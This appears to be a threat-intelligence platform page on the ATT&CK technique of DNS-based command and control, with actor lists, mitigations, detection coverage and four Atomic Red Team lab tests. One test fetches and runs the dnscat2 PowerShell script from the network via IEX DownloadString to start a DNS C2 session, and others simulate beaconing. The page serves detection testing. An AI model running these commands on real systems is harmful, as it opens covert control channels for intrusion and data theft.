Home/ATT&CK Technique/DNS
ATT&CK Technique

DNS

T1071.004 · command-and-control

Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. The DNS protocol serves an administrative function in computer networking and thus may be very common in environments.

DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

DNS beaconing may be used to send commands to remote systems via DNS queries. A DNS beacon is created by tunneling DNS traffic (i.e. Protocol Tunneling). The commands may be embedded into different DNS records, for example, TXT or A records.

DNS beacons may be difficult to detect because the beacons infrequently communicate with infected devices. Infrequent communication conceals the malicious DNS traffic with normal DNS traffic.

ESXiLinuxmacOSNetwork DevicesWindows

Actors Using This

14
chinaAPT10
chinaAPT31
iranAPT33
iranOilRig
north_koreaAPT38
chinaAPT40
chinaAPT41
chinaAquatic Panda
russia_speaking_organized_cybercrimeBumblebee Operators / EXOTIC LILY
chinaChimera (G0114)
north_koreaContagious Interview
russia_speaking_organized_cybercrimeDarkGate Operators
russia_speaking_organized_cybercrimeDarkSide / BlackMatter
chinaEarth Alux

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
resource-development earlier
T1608.001 · Upload Malware ×2.99
execution earlier
T1559.001 · Component Object Model ×3.52T1559.002 · Dynamic Data Exchange ×3.16
privilege-escalation earlier
T1548.002 · Bypass User Account Control ×3.87T1134.001 · Token Impersonation/Theft ×3.69
credential-access earlier
T1003.004 · LSA Secrets ×3.16
discovery earlier
T1069.001 · Local Groups ×3.02T1012 · Query Registry ×2.91
collection earlier
T1602 · Data from Configuration Repository ×3.69
command-and-control same
T1571 · Non-Standard Port ×3.46
exfiltration later
T1030 · Data Transfer Size Limits ×3.95
other same
T1564.004 · NTFS File Attributes ×4.15T1218.001 · Compiled HTML File ×3.87T1218.010 · Regsvr32 ×3.69T1480 · Execution Guardrails ×3.16

Atomic Tests

4
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
powershellwindowsDNS Large Query Volume
This test simulates an infected host sending a large volume of DNS queries to a command and control server. The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout. 
for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}-$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
powershellwindowsDNS Regular Beaconing
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time. This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout. 
Set-Location "PathToAtomicsFolder"
.\T1071.004\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
powershellwindowsDNS Long Domain Query
This test simulates an infected host returning data to a command and control server using long domain names. The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold. Upon execution, DNS information about the domain will be displayed for each callout. 
Set-Location "PathToAtomicsFolder"
.\T1071.004\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
powershellwindowsDNS C2
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. The following blogs have more information. https://github.com/iagox86/dnscat2 https://github.com/lukebaggett/dnscat2-powershell 
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}

Mitigations

2
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1031Network Intrusion Prevention

Use intrusion detection signatures to block traffic at network boundaries.

M1037Filter Network Traffic

Employ network appliances and endpoint software to filter ingress, egress, and lateral network traffic. This includes protocol-based filtering, enforcing firewall rules, and blocking or restricting traffic based on predefined conditions to limit adversary movement and data exfiltration.

Ingress Traffic Filtering
  • Use Case: Configure network firewalls to allow traffic only from authorized IP addresses to public-facing servers.
  • Implementation: Limit SSH (port 22) and RDP (port 3389) traffic to specific IP ranges.
Egress Traffic Filtering
  • Use Case: Use firewalls or endpoint security software to block unauthorized outbound traffic to prevent data exfiltration and command-and-control (C2) communications.
  • Implementation: Block outbound traffic to known malicious IPs or regions where communication is unexpected.
Protocol-Based Filtering
  • Use Case: Restrict the use of specific protocols that are commonly abused by adversaries, such as SMB, RPC, or Telnet, based on business needs.
  • Implementation: Disable SMBv1 on endpoints to prevent exploits like EternalBlue.
Network Segmentation
  • Use Case: Create network segments for critical systems and restrict communication between segments unless explicitly authorized.
  • Implementation: Implement VLANs to isolate IoT devices or guest networks from core business systems.
Application Layer Filtering
  • Use Case: Use proxy servers or Web Application Firewalls (WAFs) to inspect and block malicious HTTP/S traffic.
  • Implementation: Configure a WAF to block SQL injection attempts or other web application exploitation techniques.

Detection Coverage

1/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 10
Analytics (MITRE CAR) none
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

Comply & Defend

NIST 800-53AC-03, AC-04, CA-07, CM-02, CM-06, CM-07, SC-07, SC-10, SC-20, SC-21, SC-22, SC-23, SC-31, SC-37, SI-03, SI-04, SI-10, SI-15
D3FEND12 defensive techniques
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin